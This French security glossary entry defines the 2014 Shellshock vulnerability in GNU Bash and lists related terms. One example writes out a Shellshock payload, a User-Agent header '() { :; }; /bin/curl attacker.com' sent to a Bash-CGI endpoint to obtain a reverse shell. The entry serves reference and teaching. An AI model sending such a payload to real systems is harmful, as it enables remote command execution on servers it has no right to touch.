Vulnérabilités
Shellshock (CVE-2014-6271)
Aussi appelé: Bashdoor, CVE-2014-6271
Définition
Vulnérabilité de 2014 dans GNU Bash permettant d'exécuter des commandes arbitraires via des variables d'environnement spécialement conçues transmises à Bash par d'autres programmes.
Exemples
- Envoyer un User-Agent () { :; }; /bin/curl attacker.com à un endpoint Bash-CGI pour obtenir un reverse shell.
- Exploiter un client DHCP exportant des chaînes d'option dans l'environnement d'un script hook Bash.
Termes liés
Command Injection
Command Injection — definition coming soon.
CVE (Common Vulnerabilities and Exposures)
Catalogue public attribuant un identifiant unique à chaque vulnérabilité divulguée afin de la référencer sans ambiguïté dans toute l'industrie.
Vulnérabilité activement exploitée (KEV)
CVE que la CISA américaine confirme comme étant activement exploitée et ajoute à son catalogue public KEV, déclenchant des délais de remédiation pour les agences fédérales.
Cheval de Troie d'accès à distance (RAT)
Logiciel malveillant qui donne à un attaquant un contrôle furtif et interactif d'un appareil infecté, similaire à un outil caché d'administration à distance.
Exploit
Code, données ou technique exploitant une vulnérabilité pour provoquer un comportement non prévu : exécution de code, élévation de privilèges, fuite d'informations.
Élévation de privilèges
Catégorie de vulnérabilités permettant à un attaquant d'obtenir des droits supérieurs à ceux accordés initialement, par exemple passer d'un utilisateur standard à administrateur.